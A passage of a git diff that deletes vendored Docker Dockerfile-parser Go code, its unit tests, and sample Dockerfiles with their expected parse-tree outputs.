remainder. -func ParseLine(line string, d *Directive, ignoreCont bool) (string, *Node, error) { - // Handle the parser directive '# escape=. Parser directives must precede - // any builder instruction or other comments, and cannot be repeated. - if d.LookingForDirectives { - tecMatch := tokenEscapeCommand.FindStringSubmatch(strings.ToLower(line)) - if len(tecMatch) > 0 { - if d.EscapeSeen == true { - return "", nil, fmt.Errorf("only one escape parser directive can be used") - } - for i, n := range tokenEscapeCommand.SubexpNames() { - if n == "escapechar" { - if err := SetEscapeToken(tecMatch[i], d); err != nil { - return "", nil, err - } - d.EscapeSeen = true - return "", nil, nil - } - } - } - } - - d.LookingForDirectives = false - - if line = stripComments(line); line == "" { - return "", nil, nil - } - - if !ignoreCont && d.LineContinuationRegex.MatchString(line) { - line = d.LineContinuationRegex.ReplaceAllString(line, "") - return line, nil, nil - } - - cmd, flags, args, err := splitCommand(line) - if err != nil { - return "", nil, err - } - - node := &Node{} - node.Value = cmd - - sexp, attrs, err := fullDispatch(cmd, args, d) - if err != nil { - return "", nil, err - } - - node.Next = sexp - node.Attributes = attrs - node.Original = line - node.Flags = flags - - return "", node, nil -} - -// Parse is the main parse routine. -// It handles an io.ReadWriteCloser and returns the root of the AST. -func Parse(rwc io.Reader, d *Directive) (*Node, error) { - currentLine := 0 - root := &Node{} - root.StartLine = -1 - scanner := bufio.NewScanner(rwc) - - utf8bom := []byte{0xEF, 0xBB, 0xBF} - for scanner.Scan() { - scannedBytes := scanner.Bytes() - // We trim UTF8 BOM - if currentLine == 0 { - scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom) - } - scannedLine := strings.TrimLeftFunc(string(scannedBytes), unicode.IsSpace) - currentLine++ - line, child, err := ParseLine(scannedLine, d, false) - if err != nil { - return nil, err - } - startLine := currentLine - - if line != "" && child == nil { - for scanner.Scan() { - newline := scanner.Text() - currentLine++ - - if stripComments(strings.TrimSpace(newline)) == "" { - continue - } - - line, child, err = ParseLine(line+newline, d, false) - if err != nil { - return nil, err - } - - if child != nil { - break - } - } - if child == nil && line != "" { - // When we call ParseLine we'll pass in 'true' for - // the ignoreCont param if we're at the EOF. This will - // prevent the func from returning immediately w/o - // parsing the line thinking that there's more input - // to come. - - _, child, err = ParseLine(line, d, scanner.Err() == nil) - if err != nil { - return nil, err - } - } - } - - if child != nil { - // Update the line information for the current child. - child.StartLine = startLine - child.EndLine = currentLine - // Update the line information for the root. The starting line of the root is always the - // starting line of the first child and the ending line is the ending line of the last child. - if root.StartLine < 0 { - root.StartLine = currentLine - } - root.EndLine = currentLine - root.Children = append(root.Children, child) - } - } - - return root, nil -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go deleted file mode 100644 index e8e26961de..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go +++ /dev/null @@ -1,173 +0,0 @@ -package parser - -import ( - "bytes" - "fmt" - "io/ioutil" - "os" - "path/filepath" - "runtime" - "testing" -) - -const testDir = "testfiles" -const negativeTestDir = "testfiles-negative" -const testFileLineInfo = "testfile-line/Dockerfile" - -func getDirs(t *testing.T, dir string) []string { - f, err := os.Open(dir) - if err != nil { - t.Fatal(err) - } - - defer f.Close() - - dirs, err := f.Readdirnames(0) - if err != nil { - t.Fatal(err) - } - - return dirs -} - -func TestTestNegative(t *testing.T) { - for _, dir := range getDirs(t, negativeTestDir) { - dockerfile := filepath.Join(negativeTestDir, dir, "Dockerfile") - - df, err := os.Open(dockerfile) - if err != nil { - t.Fatalf("Dockerfile missing for %s: %v", dir, err) - } - defer df.Close() - - d := Directive{LookingForDirectives: true} - SetEscapeToken(DefaultEscapeToken, &d) - _, err = Parse(df, &d) - if err == nil { - t.Fatalf("No error parsing broken dockerfile for %s", dir) - } - } -} - -func TestTestData(t *testing.T) { - for _, dir := range getDirs(t, testDir) { - dockerfile := filepath.Join(testDir, dir, "Dockerfile") - resultfile := filepath.Join(testDir, dir, "result") - - df, err := os.Open(dockerfile) - if err != nil { - t.Fatalf("Dockerfile missing for %s: %v", dir, err) - } - defer df.Close() - - d := Directive{LookingForDirectives: true} - SetEscapeToken(DefaultEscapeToken, &d) - ast, err := Parse(df, &d) - if err != nil { - t.Fatalf("Error parsing %s's dockerfile: %v", dir, err) - } - - content, err := ioutil.ReadFile(resultfile) - if err != nil { - t.Fatalf("Error reading %s's result file: %v", dir, err) - } - - if runtime.GOOS == "windows" { - // CRLF --> CR to match Unix behavior - content = bytes.Replace(content, []byte{'\x0d', '\x0a'}, []byte{'\x0a'}, -1) - } - - if ast.Dump()+"\n" != string(content) { - fmt.Fprintln(os.Stderr, "Result:\n"+ast.Dump()) - fmt.Fprintln(os.Stderr, "Expected:\n"+string(content)) - t.Fatalf("%s: AST dump of dockerfile does not match result", dir) - } - } -} - -func TestParseWords(t *testing.T) { - tests := []map[string][]string{ - { - "input": {"foo"}, - "expect": {"foo"}, - }, - { - "input": {"foo bar"}, - "expect": {"foo", "bar"}, - }, - { - "input": {"foo\\ bar"}, - "expect": {"foo\\ bar"}, - }, - { - "input": {"foo=bar"}, - "expect": {"foo=bar"}, - }, - { - "input": {"foo bar 'abc xyz'"}, - "expect": {"foo", "bar", "'abc xyz'"}, - }, - { - "input": {`foo bar "abc xyz"`}, - "expect": {"foo", "bar", `"abc xyz"`}, - }, - { - "input": {"àöû"}, - "expect": {"àöû"}, - }, - { - "input": {`föo bàr "âbc xÿz"`}, - "expect": {"föo", "bàr", `"âbc xÿz"`}, - }, - } - - for _, test := range tests { - d := Directive{LookingForDirectives: true} - SetEscapeToken(DefaultEscapeToken, &d) - words := parseWords(test["input"][0], &d) - if len(words) != len(test["expect"]) { - t.Fatalf("length check failed. input: %v, expect: %q, output: %q", test["input"][0], test["expect"], words) - } - for i, word := range words { - if word != test["expect"][i] { - t.Fatalf("word check failed for word: %q. input: %q, expect: %q, output: %q", word, test["input"][0], test["expect"], words) - } - } - } -} - -func TestLineInformation(t *testing.T) { - df, err := os.Open(testFileLineInfo) - if err != nil { - t.Fatalf("Dockerfile missing for %s: %v", testFileLineInfo, err) - } - defer df.Close() - - d := Directive{LookingForDirectives: true} - SetEscapeToken(DefaultEscapeToken, &d) - ast, err := Parse(df, &d) - if err != nil { - t.Fatalf("Error parsing dockerfile %s: %v", testFileLineInfo, err) - } - - if ast.StartLine != 5 || ast.EndLine != 31 { - fmt.Fprintf(os.Stderr, "Wrong root line information: expected(%d-%d), actual(%d-%d)\n", 5, 31, ast.StartLine, ast.EndLine) - t.Fatalf("Root line information doesn't match result.") - } - if len(ast.Children) != 3 { - fmt.Fprintf(os.Stderr, "Wrong number of child: expected(%d), actual(%d)\n", 3, len(ast.Children)) - t.Fatalf("Root line information doesn't match result for %s", testFileLineInfo) - } - expected := [][]int{ - {5, 5}, - {11, 12}, - {17, 31}, - } - for i, child := range ast.Children { - if child.StartLine != expected[i][0] || child.EndLine != expected[i][1] { - t.Logf("Wrong line information for child %d: expected(%d-%d), actual(%d-%d)\n", - i, expected[i][0], expected[i][1], child.StartLine, child.EndLine) - t.Fatalf("Root line information doesn't match result.") - } - } -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile deleted file mode 100644 index c7601c9f69..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile +++ /dev/null @@ -1,35 +0,0 @@ -# ESCAPE=\ - - - -FROM brimstone/ubuntu:14.04 - - -# TORUN -v /var/run/docker.sock:/var/run/docker.sock - - -ENV GOPATH \ -/go - - - -# Install the packages we need, clean up after them and us -RUN apt-get update \ - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ - - - && apt-get install -y --no-install-recommends git golang ca-certificates \ - && apt-get clean \ - && rm -rf /var/lib/apt/lists \ - - && go get -v github.com/brimstone/consuldock \ - && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \ - - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ - && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ - && rm /tmp/dpkg.* \ - && rm -rf $GOPATH - - - - diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile deleted file mode 100644 index 1d65578794..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile +++ /dev/null @@ -1,3 +0,0 @@ -FROM busybox - -ENV PATH diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile deleted file mode 100644 index d1be4596c7..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -CMD [ "echo", [ "nested json" ] ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile deleted file mode 100644 index 00b444cba5..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile +++ /dev/null @@ -1,11 +0,0 @@ -FROM ubuntu:14.04 -MAINTAINER Seongyeol Lim - -COPY . /go/src/github.com/docker/docker -ADD . / -ADD null / -COPY nullfile /tmp -ADD [ "vimrc", "/tmp" ] -COPY [ "bashrc", "/tmp" ] -COPY [ "test file", "/tmp" ] -ADD [ "test file", "/tmp/test file" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result deleted file mode 100644 index 85aee64018..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result +++ /dev/null @@ -1,10 +0,0 @@ -(from "ubuntu:14.04") -(maintainer "Seongyeol Lim ") -(copy "." "/go/src/github.com/docker/docker") -(add "." "/") -(add "null" "/") -(copy "nullfile" "/tmp") -(add "vimrc" "/tmp") -(copy "bashrc" "/tmp") -(copy "test file" "/tmp") -(add "test file" "/tmp/test file") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile deleted file mode 100644 index 0364ef9d96..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile +++ /dev/null @@ -1,26 +0,0 @@ -#escape=\ -FROM brimstone/ubuntu:14.04 - -MAINTAINER brimstone@the.narro.ws - -# TORUN -v /var/run/docker.sock:/var/run/docker.sock - -ENV GOPATH /go - -# Set our command -ENTRYPOINT ["/usr/local/bin/consuldock"] - -# Install the packages we need, clean up after them and us -RUN apt-get update \ - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ - && apt-get install -y --no-install-recommends git golang ca-certificates \ - && apt-get clean \ - && rm -rf /var/lib/apt/lists \ - - && go get -v github.com/brimstone/consuldock \ - && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \ - - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ - && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ - && rm /tmp/dpkg.* \ - && rm -rf $GOPATH diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result deleted file mode 100644 index 227f748cda..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result +++ /dev/null @@ -1,5 +0,0 @@ -(from "brimstone/ubuntu:14.04") -(maintainer "brimstone@the.narro.ws") -(env "GOPATH" "/go") -(entrypoint "/usr/local/bin/consuldock") -(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean && apt-get install -y --no-install-recommends git golang ca-certificates && apt-get clean && rm -rf /var/lib/apt/lists \t&& go get -v github.com/brimstone/consuldock && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.* \t&& rm -rf $GOPATH") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile deleted file mode 100644 index 25ae352166..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile +++ /dev/null @@ -1,52 +0,0 @@ -FROM brimstone/ubuntu:14.04 - -CMD [] - -ENTRYPOINT ["/usr/bin/consul", "agent", "-server", "-data-dir=/consul", "-client=0.0.0.0", "-ui-dir=/webui"] - -EXPOSE 8500 8600 8400 8301 8302 - -RUN apt-get update \ - && apt-get install -y unzip wget \ - && apt-get clean \ - && rm -rf /var/lib/apt/lists - -RUN cd /tmp \ - && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip \ - -O web_ui.zip \ - && unzip web_ui.zip \ - && mv dist /webui \ - && rm web_ui.zip - -RUN apt-get update \ - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ - && apt-get install -y --no-install-recommends unzip wget \ - && apt-get clean \ - && rm -rf /var/lib/apt/lists \ - - && cd /tmp \ - && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip \ - -O web_ui.zip \ - && unzip web_ui.zip \ - && mv dist /webui \ - && rm web_ui.zip \ - - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ - && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ - && rm /tmp/dpkg.* - -ENV GOPATH /go - -RUN apt-get update \ - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ - && apt-get install -y --no-install-recommends git golang ca-certificates build-essential \ - && apt-get clean \ - && rm -rf /var/lib/apt/lists \ - - && go get -v github.com/hashicorp/consul \ - && mv $GOPATH/bin/consul /usr/bin/consul \ - - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ - && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ - && rm /tmp/dpkg.* \ - && rm -rf $GOPATH diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result deleted file mode 100644 index 16492e516a..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result +++ /dev/null @@ -1,9 +0,0 @@ -(from "brimstone/ubuntu:14.04") -(cmd) -(entrypoint "/usr/bin/consul" "agent" "-server" "-data-dir=/consul" "-client=0.0.0.0" "-ui-dir=/webui") -(expose "8500" "8600" "8400" "8301" "8302") -(run "apt-get update && apt-get install -y unzip wget \t&& apt-get clean \t&& rm -rf /var/lib/apt/lists") -(run "cd /tmp && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip -O web_ui.zip && unzip web_ui.zip && mv dist /webui && rm web_ui.zip") -(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean && apt-get install -y --no-install-recommends unzip wget && apt-get clean && rm -rf /var/lib/apt/lists && cd /tmp && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip -O web_ui.zip && unzip web_ui.zip && mv dist /webui && rm web_ui.zip \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.*") -(env "GOPATH" "/go") -(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean && apt-get install -y --no-install-recommends git golang ca-certificates build-essential && apt-get clean && rm -rf /var/lib/apt/lists \t&& go get -v github.com/hashicorp/consul \t&& mv $GOPATH/bin/consul /usr/bin/consul \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.* \t&& rm -rf $GOPATH") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile deleted file mode 100644 index 42b324e77b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile +++ /dev/null @@ -1,36 +0,0 @@ -FROM ubuntu:14.04 - -RUN echo hello\ - world\ - goodnight \ - moon\ - light\ -ning -RUN echo hello \ - world -RUN echo hello \ -world -RUN echo hello \ -goodbye\ -frog -RUN echo hello \ -world -RUN echo hi \ - \ - world \ -\ - good\ -\ -night -RUN echo goodbye\ -frog -RUN echo good\ -bye\ -frog - -RUN echo hello \ -# this is a comment - -# this is a comment with a blank line surrounding it - -this is some more useful stuff diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result deleted file mode 100644 index 268ae073c8..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result +++ /dev/null @@ -1,10 +0,0 @@ -(from "ubuntu:14.04") -(run "echo hello world goodnight moon lightning") -(run "echo hello world") -(run "echo hello world") -(run "echo hello goodbyefrog") -(run "echo hello world") -(run "echo hi world goodnight") -(run "echo goodbyefrog") -(run "echo goodbyefrog") -(run "echo hello this is some more useful stuff") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile deleted file mode 100644 index 8ccb71a578..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile +++ /dev/null @@ -1,54 +0,0 @@ -FROM cpuguy83/ubuntu -ENV NAGIOS_HOME /opt/nagios -ENV NAGIOS_USER nagios -ENV NAGIOS_GROUP nagios -ENV NAGIOS_CMDUSER nagios -ENV NAGIOS_CMDGROUP nagios -ENV NAGIOSADMIN_USER nagiosadmin -ENV NAGIOSADMIN_PASS nagios -ENV APACHE_RUN_USER nagios -ENV APACHE_RUN_GROUP nagios -ENV NAGIOS_TIMEZONE UTC - -RUN sed -i 's/universe/universe multiverse/' /etc/apt/sources.list -RUN apt-get update && apt-get install -y iputils-ping netcat build-essential snmp snmpd snmp-mibs-downloader php5-cli apache2 libapache2-mod-php5 runit bc postfix bsd-mailx -RUN ( egrep -i "^${NAGIOS_GROUP}" /etc/group || groupadd $NAGIOS_GROUP ) && ( egrep -i "^${NAGIOS_CMDGROUP}" /etc/group || groupadd $NAGIOS_CMDGROUP ) -RUN ( id -u $NAGIOS_USER || useradd --system $NAGIOS_USER -g $NAGIOS_GROUP -d $NAGIOS_HOME ) && ( id -u $NAGIOS_CMDUSER || useradd --system -d $NAGIOS_HOME -g $NAGIOS_CMDGROUP $NAGIOS_CMDUSER ) - -ADD http://downloads.sourceforge.net/project/nagios/nagios-3.x/nagios-3.5.1/nagios-3.5.1.tar.gz?r=http%3A%2F%2Fwww.nagios.org%2Fdownload%2Fcore%2Fthanks%2F%3Ft%3D1398863696&ts=1398863718&use_mirror=superb-dca3 /tmp/nagios.tar.gz -RUN cd /tmp && tar -zxvf nagios.tar.gz && cd nagios && ./configure --prefix=${NAGIOS_HOME} --exec-prefix=${NAGIOS_HOME} --enable-event-broker --with-nagios-command-user=${NAGIOS_CMDUSER} --with-command-group=${NAGIOS_CMDGROUP} --with-nagios-user=${NAGIOS_USER} --with-nagios-group=${NAGIOS_GROUP} && make all && make install && make install-config && make install-commandmode && cp sample-config/httpd.conf /etc/apache2/conf.d/nagios.conf -ADD http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz /tmp/ -RUN cd /tmp && tar -zxvf nagios-plugins-1.5.tar.gz && cd nagios-plugins-1.5 && ./configure --prefix=${NAGIOS_HOME} && make && make install - -RUN sed -i.bak 's/.*\=www\-data//g' /etc/apache2/envvars -RUN export DOC_ROOT="DocumentRoot $(echo $NAGIOS_HOME/share)"; sed -i "s,DocumentRoot.*,$DOC_ROOT," /etc/apache2/sites-enabled/000-default - -RUN ln -s ${NAGIOS_HOME}/bin/nagios /usr/local/bin/nagios && mkdir -p /usr/share/snmp/mibs && chmod 0755 /usr/share/snmp/mibs && touch /usr/share/snmp/mibs/.foo - -RUN echo "use_timezone=$NAGIOS_TIMEZONE" >> ${NAGIOS_HOME}/etc/nagios.cfg && echo "SetEnv TZ \"${NAGIOS_TIMEZONE}\"" >> /etc/apache2/conf.d/nagios.conf - -RUN mkdir -p ${NAGIOS_HOME}/etc/conf.d && mkdir -p ${NAGIOS_HOME}/etc/monitor && ln -s /usr/share/snmp/mibs ${NAGIOS_HOME}/libexec/mibs -RUN echo "cfg_dir=${NAGIOS_HOME}/etc/conf.d" >> ${NAGIOS_HOME}/etc/nagios.cfg -RUN echo "cfg_dir=${NAGIOS_HOME}/etc/monitor" >> ${NAGIOS_HOME}/etc/nagios.cfg -RUN download-mibs && echo "mibs +ALL" > /etc/snmp/snmp.conf - -RUN sed -i 's,/bin/mail,/usr/bin/mail,' /opt/nagios/etc/objects/commands.cfg && \ - sed -i 's,/usr/usr,/usr,' /opt/nagios/etc/objects/commands.cfg -RUN cp /etc/services /var/spool/postfix/etc/ - -RUN mkdir -p /etc/sv/nagios && mkdir -p /etc/sv/apache && rm -rf /etc/sv/getty-5 && mkdir -p /etc/sv/postfix -ADD nagios.init /etc/sv/nagios/run -ADD apache.init /etc/sv/apache/run -ADD postfix.init /etc/sv/postfix/run -ADD postfix.stop /etc/sv/postfix/finish - -ADD start.sh /usr/local/bin/start_nagios - -ENV APACHE_LOCK_DIR /var/run -ENV APACHE_LOG_DIR /var/log/apache2 - -EXPOSE 80 - -VOLUME ["/opt/nagios/var", "/opt/nagios/etc", "/opt/nagios/libexec", "/var/log/apache2", "/usr/share/snmp/mibs"] - -CMD ["/usr/local/bin/start_nagios"] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result deleted file mode 100644 index 25dd3ddfe5..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result +++ /dev/null @@ -1,40 +0,0 @@ -(from "cpuguy83/ubuntu") -(env "NAGIOS_HOME" "/opt/nagios") -(env "NAGIOS_USER" "nagios") -(env "NAGIOS_GROUP" "nagios") -(env "NAGIOS_CMDUSER" "nagios") -(env "NAGIOS_CMDGROUP" "nagios") -(env "NAGIOSADMIN_USER" "nagiosadmin") -(env "NAGIOSADMIN_PASS" "nagios") -(env "APACHE_RUN_USER" "nagios") -(env "APACHE_RUN_GROUP" "nagios") -(env "NAGIOS_TIMEZONE" "UTC") -(run "sed -i 's/universe/universe multiverse/' /etc/apt/sources.list") -(run "apt-get update && apt-get install -y iputils-ping netcat build-essential snmp snmpd snmp-mibs-downloader php5-cli apache2 libapache2-mod-php5 runit bc postfix bsd-mailx") -(run "( egrep -i \"^${NAGIOS_GROUP}\" /etc/group || groupadd $NAGIOS_GROUP ) && ( egrep -i \"^${NAGIOS_CMDGROUP}\" /etc/group || groupadd $NAGIOS_CMDGROUP )") -(run "( id -u $NAGIOS_USER || useradd --system $NAGIOS_USER -g $NAGIOS_GROUP -d $NAGIOS_HOME ) && ( id -u $NAGIOS_CMDUSER || useradd --system -d $NAGIOS_HOME -g $NAGIOS_CMDGROUP $NAGIOS_CMDUSER )") -(add "http://downloads.sourceforge.net/project/nagios/nagios-3.x/nagios-3.5.1/nagios-3.5.1.tar.gz?r=http%3A%2F%2Fwww.nagios.org%2Fdownload%2Fcore%2Fthanks%2F%3Ft%3D1398863696&ts=1398863718&use_mirror=superb-dca3" "/tmp/nagios.tar.gz") -(run "cd /tmp && tar -zxvf nagios.tar.gz && cd nagios && ./configure --prefix=${NAGIOS_HOME} --exec-prefix=${NAGIOS_HOME} --enable-event-broker --with-nagios-command-user=${NAGIOS_CMDUSER} --with-command-group=${NAGIOS_CMDGROUP} --with-nagios-user=${NAGIOS_USER} --with-nagios-group=${NAGIOS_GROUP} && make all && make install && make install-config && make install-commandmode && cp sample-config/httpd.conf /etc/apache2/conf.d/nagios.conf") -(add "http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz" "/tmp/") -(run "cd /tmp && tar -zxvf nagios-plugins-1.5.tar.gz && cd nagios-plugins-1.5 && ./configure --prefix=${NAGIOS_HOME} && make && make install") -(run "sed -i.bak 's/.*\\=www\\-data//g' /etc/apache2/envvars") -(run "export DOC_ROOT=\"DocumentRoot $(echo $NAGIOS_HOME/share)\"; sed -i \"s,DocumentRoot.*,$DOC_ROOT,\" /etc/apache2/sites-enabled/000-default") -(run "ln -s ${NAGIOS_HOME}/bin/nagios /usr/local/bin/nagios && mkdir -p /usr/share/snmp/mibs && chmod 0755 /usr/share/snmp/mibs && touch /usr/share/snmp/mibs/.foo") -(run "echo \"use_timezone=$NAGIOS_TIMEZONE\" >> ${NAGIOS_HOME}/etc/nagios.cfg && echo \"SetEnv TZ \\\"${NAGIOS_TIMEZONE}\\\"\" >> /etc/apache2/conf.d/nagios.conf") -(run "mkdir -p ${NAGIOS_HOME}/etc/conf.d && mkdir -p ${NAGIOS_HOME}/etc/monitor && ln -s /usr/share/snmp/mibs ${NAGIOS_HOME}/libexec/mibs") -(run "echo \"cfg_dir=${NAGIOS_HOME}/etc/conf.d\" >> ${NAGIOS_HOME}/etc/nagios.cfg") -(run "echo \"cfg_dir=${NAGIOS_HOME}/etc/monitor\" >> ${NAGIOS_HOME}/etc/nagios.cfg") -(run "download-mibs && echo \"mibs +ALL\" > /etc/snmp/snmp.conf") -(run "sed -i 's,/bin/mail,/usr/bin/mail,' /opt/nagios/etc/objects/commands.cfg && sed -i 's,/usr/usr,/usr,' /opt/nagios/etc/objects/commands.cfg") -(run "cp /etc/services /var/spool/postfix/etc/") -(run "mkdir -p /etc/sv/nagios && mkdir -p /etc/sv/apache && rm -rf /etc/sv/getty-5 && mkdir -p /etc/sv/postfix") -(add "nagios.init" "/etc/sv/nagios/run") -(add "apache.init" "/etc/sv/apache/run") -(add "postfix.init" "/etc/sv/postfix/run") -(add "postfix.stop" "/etc/sv/postfix/finish") -(add "start.sh" "/usr/local/bin/start_nagios") -(env "APACHE_LOCK_DIR" "/var/run") -(env "APACHE_LOG_DIR" "/var/log/apache2") -(expose "80") -(volume "/opt/nagios/var" "/opt/nagios/etc" "/opt/nagios/libexec" "/var/log/apache2" "/usr/share/snmp/mibs") -(cmd "/usr/local/bin/start_nagios") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile deleted file mode 100644 index 99fbe55be0..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile +++ /dev/null @@ -1,103 +0,0 @@ -# This file describes the standard way to build Docker, using docker -# -# Usage: -# -# # Assemble the full dev environment. This is slow the first time. -# docker build -t docker . -# -# # Mount your source in an interactive container for quick testing: -# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash -# -# # Run the test suite: -# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py -# -# # Publish a release: -# docker run --privileged \ -# -e AWS_S3_BUCKET=baz \ -# -e AWS_ACCESS_KEY=foo \ -# -e AWS_SECRET_KEY=bar \ -# -e GPG_PASSPHRASE=gloubiboulga \ -# docker hack/release.sh -# -# Note: AppArmor used to mess with privileged mode, but this is no longer -# the case. Therefore, you don't have to disable it anymore. -# - -FROM ubuntu:14.04 -MAINTAINER Tianon Gravi (@tianon) - -# Packaged dependencies -RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -yq \ - apt-utils \ - aufs-tools \ - automake \ - btrfs-tools \ - build-essential \ - curl \ - dpkg-sig \ - git \ - iptables \ - libapparmor-dev \ - libcap-dev \ - libsqlite3-dev \ - mercurial \ - pandoc \ - parallel \ - reprepro \ - ruby1.9.1 \ - ruby1.9.1-dev \ - s3cmd=1.1.0* \ - --no-install-recommends - -# Get lvm2 source for compiling statically -RUN git clone --no-checkout https://git.fedorahosted.org/git/lvm2.git /usr/local/lvm2 && cd /usr/local/lvm2 && git checkout -q v2_02_103 -# see https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags -# note: we don't use "git clone -b" above because it then spews big nasty warnings about 'detached HEAD' state that we can't silence as easily as we can silence them using "git checkout" directly - -# Compile and install lvm2 